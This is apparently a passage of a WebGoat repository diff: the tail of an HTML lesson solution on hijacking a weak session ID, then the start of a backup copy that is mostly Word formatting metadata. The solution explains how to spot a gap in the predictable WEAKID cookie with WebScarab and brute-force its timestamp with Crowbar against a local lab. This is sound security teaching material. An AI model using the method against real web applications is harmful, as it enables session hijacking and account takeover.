style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> WebScarabs SessionID Analysis<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
that WebScarab is able to fetch the WEAKID cookie, you need to click the "Test"
button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=368
src="lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> SessionID WEAKID discovered<span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you dont
have a pop-up window with the Extracted Sessionids, you must edit the Request.
You must delete the WEAKID value from the request. Without this cookie value,
WebGoat will return a HTTP Header "Set-Cookie: WEAKID=value" so WebScarab
learns about this value.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
samples and examine the results. Enter "50" in the "Samples" window and click
the button "Fetch". You will not see any information about progress.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=23
src="lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
to go to the tab "Analysis".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
</v:shape><![endif]--><![if !vml]><img width=640 height=71
src="lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the "Analysis"
pane you see nothing. <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=369
src="lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The WEAKID is
divided in 2 parts: the first part is an identifier that is added 1 in every
cookie and a time value. The time value is calculated at the moment that you
submit the request.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Notice that
there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
value that is missing is the value that you need to know to log on. Now you
only need to calculate the timestamp. This can be brute-forced using Crowbar.
You know the previous timestamp and the next timestamp so you have a start and
end value.<br>
You can download Crowbar for free: <a href="http://www.sensepost.com/research/crowbar/" target="_blank">http://www.sensepost.com/research/crowbar/</a>
<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=641 height=451
src="lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
value 16935 and a value 16937 with a numeric difference of 28110 instead of
14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
request in Crowbar:<o:p></o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=596 height=510
src="lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
to localhost and adjust the port.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
response. Make sure that you see "How to hijack a session" in the middle
window.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
in the WEAKID parameter where you want to brute-force the value and be aware, that the first part of the WEAKID is the one we are searching for (16936).
The WEAKID in Crowbar lookes like this: Cookie: JSESSIONID=...; WEAKID=1693<font color="ff0000">6</font>-1163685<font color="ff0000">##1##</font>;<br>
Start the first loop at 363093, the last digits of the last cookie before the
authentication cookie and 363203, the first cookie after the authentication
cookie. You have to enter these two values in the Parameter1 fields. We have to brute-force these values, but we are sure that they lie
between these two boundaries.<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
results until you see a different fuzzy logic value (the blue line in Figure 3), right-click it and click on "Show
reply".<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=461
src="lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Lesson 12 Completed<span style='font-family:
"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
</div>
<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
<tr>
<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
Solution by Erwin Geirnaert
</td>
<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
</tr>
</table>
</body>
</html>

889
src/main/webapp/lesson_solutions/WeakSessionID.htmlBAK Normal file
View File

@ -0,0 +1,889 @@
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: How to Hijack a Session</title>
<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>egeirnaert</o:Author>
<o:LastAuthor>egeirnaert</o:LastAuthor>
<o:Revision>3</o:Revision>
<o:TotalTime>27</o:TotalTime>
<o:Created>2007-07-11T10:54:00Z</o:Created>
<o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
<o:Pages>3</o:Pages>
<o:Words>469</o:Words>
<o:Characters>2677</o:Characters>
<o:Company> </o:Company>
<o:Lines>22</o:Lines>
<o:Paragraphs>6</o:Paragraphs>
<o:CharactersWithSpaces>3140</o:CharactersWithSpaces>
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
